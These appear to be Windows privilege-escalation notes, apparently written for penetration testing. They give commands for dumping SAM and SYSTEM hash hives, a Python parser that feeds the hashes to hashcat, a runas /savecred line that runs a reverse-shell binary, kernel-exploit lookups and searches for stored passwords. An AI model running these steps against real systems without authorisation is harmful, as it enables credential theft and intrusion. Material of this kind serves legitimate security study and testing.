If winPEAS reports the SYSTEM and SAM hives as readable, use one of these:
C:\Windows\System32\config\SAM holds the local password hashes; C:\Windows\System32\config\SYSTEM holds the boot key that decrypts them, so you need both files
On a domain controller the domain database is C:\Windows\NTDS\ntds.dit (also decrypted with the SYSTEM hive)
To get the hashes:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
python2 pwdump.py /tools/SYSTEM /tools/SAM
Output is user:rid:lmhash:nthash:::. An NT hash starting with 31d6 (31d6cfe0d16ae931b73c59d7e0c089c0) is the empty password; an LM hash of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (the default on modern Windows)
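Added example (not part of the original notes, and not impacket or pwdump code): a small parser for the user:rid:lmhash:nthash::: lines that secretsdump and pwdump.py print. It skips banner lines, flags the empty-password NT hash and any account that still stores an LM hash, groups accounts that share an NT hash (same password), and emits user:nthash lines for hashcat mode 1000. The SAMPLE_DUMP text is constructed; every hash in it is made up except the two well-known constants.

```python
import re
from collections import defaultdict

# Well-known constants (facts, not assumptions): the NT hash of the empty
# password and the LM value stored when no LM hash is kept at all.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One dump line: user:rid:lmhash:nthash:::  (secretsdump and pwdump.py both emit this)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)

# Constructed sample output; every hash value here is made up except the two
# well-known constants above.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c1d9f3a6bdb0b8b2c8c4f7a9e1d2b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0d7ad1e5c2f4a9b8e6c3d2f1a0b9c8d7:8fa2c3d4e5f60718293a4b5c6d7e8f90:::
dev:1002:aad3b435b51404eeaad3b435b51404ee:1c1d9f3a6bdb0b8b2c8c4f7a9e1d2b33:::
[*] Cleaning up...
"""

def parse_dump(text):
    """Return one dict per hash line; banner/status lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        a = m.groupdict()
        a["rid"] = int(a["rid"])
        a["lm"] = a["lm"].lower()
        a["nt"] = a["nt"].lower()
        a["empty_password"] = a["nt"] == EMPTY_NT
        a["lm_stored"] = a["lm"] != EMPTY_LM   # LM is trivially crackable, flag it
        accounts.append(a)
    return accounts

def triage(accounts):
    """Pick out what matters before cracking: empty passwords, stored LM hashes,
    and accounts that share an NT hash (same password, possibly reused)."""
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    return {
        "empty_password": [a["user"] for a in accounts if a["empty_password"]],
        "lm_stored": [a["user"] for a in accounts if a["lm_stored"]],
        "shared_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
    }

def hashcat_ntlm_lines(accounts):
    """user:nthash lines for hashcat -m 1000 --username, skipping empty passwords."""
    return [f"{a['user']}:{a['nt']}" for a in accounts if not a["empty_password"]]

if __name__ == "__main__":
    accs = parse_dump(SAMPLE_DUMP)
    for k, v in triage(accs).items():
        print(f"{k}: {v}")
    print("\n".join(hashcat_ntlm_lines(accs)))
```

Feed it the real dump with parse_dump(open("hashes.txt").read()); the shared_nt bucket is worth checking first, because one cracked password then logs in as every account in that bucket.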
Automatic (kernel exploit suggestions from saved systeminfo output):
Wesng:
python3 wesng.py /tools/systeminfo.txt -i 'Elevation of Privilege' --exploit-only | more
Manual:
Use stored credentials (list them first with cmdkey /list; if an entry for the target user exists, runas /savecred reuses it without prompting):
runas /savecred /user:admin C:\Path\to\reverse.exe
Search file contents for a keyword (/S recursive, /I case-insensitive, /M print only the file name):
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
findstr /SIM /C:"GitLab" *.txt #Replace GitLab with any keyword
System info (cmd):
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Chimichurri (MS10-059) is a known local privilege escalation for Windows Server 2008 R1 & R2, Windows Vista and Windows 7
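Added example (not from the original notes, not wesng code): a parser for saved systeminfo output that pulls the same three fields the findstr one-liner prints, plus the installed hotfix list, so you can check architecture and whether a specific KB is present before (or instead of) running wesng. SAMPLE_SYSTEMINFO is a constructed, trimmed systeminfo dump; the hostname and KB numbers are placeholders for the example.

```python
import re

# Constructed systeminfo output, trimmed to the fields used here; the hostname
# and KB numbers are placeholders, not a real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB2534111
                           [03]: KB976902
Network Card(s):           1 NIC(s) Installed.
"""

# systeminfo label -> key in the result dict
FIELDS = {"OS Name": "os_name", "OS Version": "os_version", "System Type": "system_type"}
# hotfix entries are indented "[NN]: KBxxxxxx" lines under "Hotfix(s):"
HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$")

def parse_systeminfo(text):
    """Pull the same three fields the findstr one-liner prints, plus the hotfix list."""
    info = {v: None for v in FIELDS.values()}
    info["hotfixes"] = []
    for line in text.splitlines():
        m = HOTFIX_RE.match(line)
        if m:
            info["hotfixes"].append(m.group(1))
            continue
        key, sep, value = line.partition(":")
        if sep and key.strip() in FIELDS:
            info[FIELDS[key.strip()]] = value.strip()
    # "x64-based PC" vs "X86-based PC": decides which exploit build you need
    info["is_64bit"] = bool(info["system_type"]) and info["system_type"].startswith("x64")
    return info

def missing_hotfixes(info, wanted):
    """Which of the KBs you care about are absent (case-insensitive compare)."""
    installed = {kb.upper() for kb in info["hotfixes"]}
    return [kb for kb in wanted if kb.upper() not in installed]

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], "|", info["os_version"], "|", info["system_type"])
    print("hotfixes:", info["hotfixes"])
    print("missing:", missing_hotfixes(info, ["KB976902", "KB4012212"]))
```

Use it on the real capture with parse_systeminfo(open("systeminfo.txt", encoding="utf-8", errors="replace").read()); systeminfo on non-English Windows localizes the labels, so adjust FIELDS for that locale if the fields come back as None.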
Check files with pass in the name or a .config extension, recursively from the current directory:
Run it in a temp or suspicious program directory
dir /s *pass* == *.config
List all scheduled tasks:
schtasks /query /fo LIST /v
To check all running processes (with the services hosted in each):
tasklist /SVC
Check password in registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Get patches:
wmic qfe get Caption,Description,HotFixID,InstalledOn
To get disks:
wmic logicaldisk get caption,description,providername
To check privileges (look for SeImpersonatePrivilege, SeBackupPrivilege, SeDebugPrivilege etc.):
whoami /priv
To check the groups the current user is in:
whoami /groups
To check users:
net user
Can also check a specific user with:
net user administrator
We can check the details of a group listed by the above command with (replace Administrators with the group name):
net localgroup Administrators
To look at the arp table:
arp -a
Print routes:
route print
For active connections (with owning PID, to match against tasklist):
netstat -ano
Search for password in file contents (current directory, recursive, case-insensitive):
findstr /si password *.txt *.ini *.config
Check Firewall and AV
To check Windows Defender (service state):
sc query windefend
List all services:
sc queryex type= service
Check firewall (netsh firewall is deprecated from Windows 7 onward, so the advfirewall form is the one that works on current systems):
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config